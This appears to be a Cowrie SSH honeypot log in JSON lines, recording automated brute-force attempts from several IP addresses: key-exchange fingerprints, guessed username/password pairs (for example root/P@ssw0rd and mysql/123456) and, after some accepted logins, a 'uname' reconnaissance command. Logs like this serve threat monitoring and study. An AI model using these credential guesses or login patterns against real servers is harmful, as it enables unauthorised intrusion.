{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:24:23.207456Z","src_ip":"212.227.125.160","session":"951cb4f3cb32"}
{"eventid":"cowrie.login.failed","username":"omsagent","password":"omsagent","message":"login attempt [omsagent/omsagent] failed","sensor":"my-vps","timestamp":"2025-08-26T11:24:23.387345Z","src_ip":"212.227.125.160","session":"951cb4f3cb32"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:24:24.709822Z","src_ip":"212.227.125.160","session":"951cb4f3cb32"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43178,"dst_ip":"1.2.3.4","dst_port":22,"session":"72dd2a35d214","protocol":"ssh","message":"New connection: 212.227.125.160:43178 (1.2.3.4:22) [session: 72dd2a35d214]","sensor":"my-vps","timestamp":"2025-08-26T11:24:29.137911Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:24:29.138648Z","src_ip":"212.227.125.160","session":"72dd2a35d214"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:24:30.323428Z","src_ip":"212.227.125.160","session":"72dd2a35d214"}
{"eventid":"cowrie.login.success","username":"root","password":"qQ123456","message":"login attempt [root/qQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:24:30.839735Z","src_ip":"212.227.125.160","session":"72dd2a35d214"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:24:31.130858Z","src_ip":"212.227.125.160","session":"72dd2a35d214"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:24:31.131516Z","src_ip":"212.227.125.160","session":"72dd2a35d214"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:24:31.317436Z","src_ip":"212.227.125.160","session":"72dd2a35d214"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:24:31.318583Z","src_ip":"212.227.125.160","session":"72dd2a35d214"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":54050,"dst_ip":"1.2.3.4","dst_port":22,"session":"73152231215e","protocol":"ssh","message":"New connection: 83.168.105.65:54050 (1.2.3.4:22) [session: 73152231215e]","sensor":"my-vps","timestamp":"2025-08-26T11:24:36.283062Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:24:36.284192Z","src_ip":"83.168.105.65","session":"73152231215e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:24:36.323465Z","src_ip":"83.168.105.65","session":"73152231215e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43948,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fdc32a29035","protocol":"ssh","message":"New connection: 212.227.125.160:43948 (1.2.3.4:22) [session: 9fdc32a29035]","sensor":"my-vps","timestamp":"2025-08-26T11:24:36.409950Z"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache123","message":"login attempt [apache/apache123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:24:36.442576Z","src_ip":"83.168.105.65","session":"73152231215e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:24:36.469310Z","src_ip":"212.227.125.160","session":"9fdc32a29035"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:24:36.469974Z","src_ip":"212.227.125.160","session":"9fdc32a29035"}
{"eventid":"cowrie.login.failed","username":"applmgr","password":"applmgr","message":"login attempt [applmgr/applmgr] failed","sensor":"my-vps","timestamp":"2025-08-26T11:24:37.240307Z","src_ip":"212.227.125.160","session":"9fdc32a29035"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:24:37.483662Z","src_ip":"83.168.105.65","session":"73152231215e"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:24:38.295611Z","src_ip":"212.227.125.160","session":"9fdc32a29035"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":33900,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7064dc50e16","protocol":"ssh","message":"New connection: 196.251.86.249:33900 (1.2.3.4:22) [session: b7064dc50e16]","sensor":"my-vps","timestamp":"2025-08-26T11:24:40.314043Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:24:41.189346Z","src_ip":"196.251.86.249","session":"b7064dc50e16"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:24:41.190042Z","src_ip":"196.251.86.249","session":"b7064dc50e16"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44722,"dst_ip":"1.2.3.4","dst_port":22,"session":"af3a56466e11","protocol":"ssh","message":"New connection: 212.227.125.160:44722 (1.2.3.4:22) [session: af3a56466e11]","sensor":"my-vps","timestamp":"2025-08-26T11:24:42.682261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:24:42.682934Z","src_ip":"212.227.125.160","session":"af3a56466e11"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:24:42.732827Z","src_ip":"212.227.125.160","session":"af3a56466e11"}
{"eventid":"cowrie.login.failed","username":"tools","password":"tools","message":"login attempt [tools/tools] failed","sensor":"my-vps","timestamp":"2025-08-26T11:24:42.894267Z","src_ip":"212.227.125.160","session":"af3a56466e11"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"1234qwer","message":"login attempt [hadoop/1234qwer] failed","sensor":"my-vps","timestamp":"2025-08-26T11:24:42.969112Z","src_ip":"196.251.86.249","session":"b7064dc50e16"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:24:43.947822Z","src_ip":"212.227.125.160","session":"af3a56466e11"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:24:44.509029Z","src_ip":"196.251.86.249","session":"b7064dc50e16"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45488,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a06d3999da6","protocol":"ssh","message":"New connection: 212.227.125.160:45488 (1.2.3.4:22) [session: 6a06d3999da6]","sensor":"my-vps","timestamp":"2025-08-26T11:24:48.532638Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:24:48.533614Z","src_ip":"212.227.125.160","session":"6a06d3999da6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:24:48.585072Z","src_ip":"212.227.125.160","session":"6a06d3999da6"}
{"eventid":"cowrie.login.success","username":"root","password":"a123456A","message":"login attempt [root/a123456A] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:24:48.747100Z","src_ip":"212.227.125.160","session":"6a06d3999da6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:24:48.907042Z","src_ip":"212.227.125.160","session":"6a06d3999da6"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:24:48.907692Z","src_ip":"212.227.125.160","session":"6a06d3999da6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:24:48.959891Z","src_ip":"212.227.125.160","session":"6a06d3999da6"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:24:48.960891Z","src_ip":"212.227.125.160","session":"6a06d3999da6"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":60596,"dst_ip":"1.2.3.4","dst_port":22,"session":"767a37e10d4b","protocol":"ssh","message":"New connection: 83.168.105.65:60596 (1.2.3.4:22) [session: 767a37e10d4b]","sensor":"my-vps","timestamp":"2025-08-26T11:24:51.836405Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:24:51.838144Z","src_ip":"83.168.105.65","session":"767a37e10d4b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:24:51.877599Z","src_ip":"83.168.105.65","session":"767a37e10d4b"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssw0rd","message":"login attempt [root/P@ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:24:51.997039Z","src_ip":"83.168.105.65","session":"767a37e10d4b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:24:52.092553Z","src_ip":"83.168.105.65","session":"767a37e10d4b"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:24:52.093279Z","src_ip":"83.168.105.65","session":"767a37e10d4b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:24:52.133708Z","src_ip":"83.168.105.65","session":"767a37e10d4b"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:24:52.134920Z","src_ip":"83.168.105.65","session":"767a37e10d4b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46254,"dst_ip":"1.2.3.4","dst_port":22,"session":"833ccc968799","protocol":"ssh","message":"New connection: 212.227.125.160:46254 (1.2.3.4:22) [session: 833ccc968799]","sensor":"my-vps","timestamp":"2025-08-26T11:24:53.772806Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:24:53.778065Z","src_ip":"212.227.125.160","session":"833ccc968799"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:24:53.828746Z","src_ip":"212.227.125.160","session":"833ccc968799"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123456","message":"login attempt [mysql/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:24:54.029444Z","src_ip":"212.227.125.160","session":"833ccc968799"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:24:55.081117Z","src_ip":"212.227.125.160","session":"833ccc968799"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47032,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d1e850e2a66","protocol":"ssh","message":"New connection: 212.227.125.160:47032 (1.2.3.4:22) [session: 3d1e850e2a66]","sensor":"my-vps","timestamp":"2025-08-26T11:24:59.615331Z"}
